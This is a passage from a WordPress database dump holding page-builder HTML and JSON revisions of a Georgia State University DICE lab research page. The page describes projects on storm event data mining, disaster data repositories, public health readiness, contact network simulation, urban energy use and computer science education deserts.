h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">ORPHEUS</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 11:16:59','2023-09-29 15:16:59','',126,'https://gsudice.dataconn.net/?p=1550',0,'revision','',0),(1556,1,'2023-09-29 11:17:45','2023-09-29 15:17:45','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 11:17:45','2023-09-29 15:17:45','',438,'https://gsudice.dataconn.net/?p=1556',0,'revision','',0),(1557,1,'2023-09-29 11:17:45','2023-09-29 15:17:45','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster 